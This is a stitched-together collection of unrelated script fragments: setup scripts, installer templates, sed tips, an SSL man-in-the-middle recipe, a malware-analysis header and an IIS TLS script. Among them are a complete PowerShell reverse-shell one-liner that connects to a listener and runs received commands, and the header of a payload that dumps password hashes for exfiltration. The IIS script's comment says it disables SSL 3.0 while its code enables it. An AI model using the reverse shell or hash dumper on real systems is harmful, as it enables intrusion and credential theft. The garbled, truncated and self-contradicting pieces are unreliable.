H0K5

#!/bin/bash

# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update

# remove previously installed Docker
sudo apt-get remove docker docker-engine docker.io* lxc-docker*

# install dependencies 4 cert

H0K5

#############################################################################################################
# PowerSlim 0.1
#############################################################################################################
import os,re
import clr,os	
clr.AddReference("System.Management")
clr.AddReference("System.Management.Automation")
from System.Management.Automation import *
from System.Management.Automation.Host import *
from System.Management.Automation.Runspaces import *

H0K5

Simple SSL MiTM

A quick and dirty SSL MiTM using stunnel

• Generate a SSL certificate .. or use Let's Encrypt (for the green lock)

openssl req -batch -new -x509 -days 365 -nodes -out mitm.pem -keyout mitm.pem

• Run stunnel

H0K5

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

H0K5

## uploaded by @JohnLaTwC
## sample hash: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
MHT:MASIHB-- 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
===============================================================================
FILE: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
Type: MHTML
-------------------------------------------------------------------------------

H0K5

#
#Generic Kickstart template for Ubuntu
#Platform: x86 and x86-64
#

#System language
lang fr_FR

#Language modules to install
langsupport fr_FR

H0K5

#### Startup.

# To use a preseed file, you'll first need to boot the installer,
# and tell it what preseed file to use. This is done by passing the
# kernel a boot parameter, either manually at boot or by editing the
# syslinux.cfg (or similar) file and adding the parameter to the end
# of the append line(s) for the kernel.
#
# If you're netbooting, use this:
#   preseed/url=http://host/path/to/preseed

H0K5

FILE SPACING:

 # double space a file
 sed G

 # double space a file which already has blank lines in it. Output file
 # should contain no more than one blank line between lines of text.
 sed '/^$/d;G'

H0K5

function Get-PassHashes {
<# 
    .SYNOPSIS 
    Nishang payload which dumps password hashes. 
     
    .DESCRIPTION 
    The payload uses Enable-DuplicateToken payload and then the hashes are dumped using the powerdump script from MSF.
    The hashes could be exfiltrated using method of choice.

    .PARAMETER exfil

H0K5

# This PowerShell script setups your Microsoft Internet Information Server 7.5 and
# 8.0 (IIS) to support TLS 1.1 and TLS 1.2 protocol with Forward secrecy.
#
# Additionally it disables insecure SSL2 and all insecure and weak ciphers.
# requitres a system restart to apply changes.
 
# Add and Enable SSL 3.0 for client and server SCHANNEL communications
md 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0' -Force
md 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server' -Force
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server' -name 'Enabled' -value '0xffffffff' -PropertyType 'DWord' -Force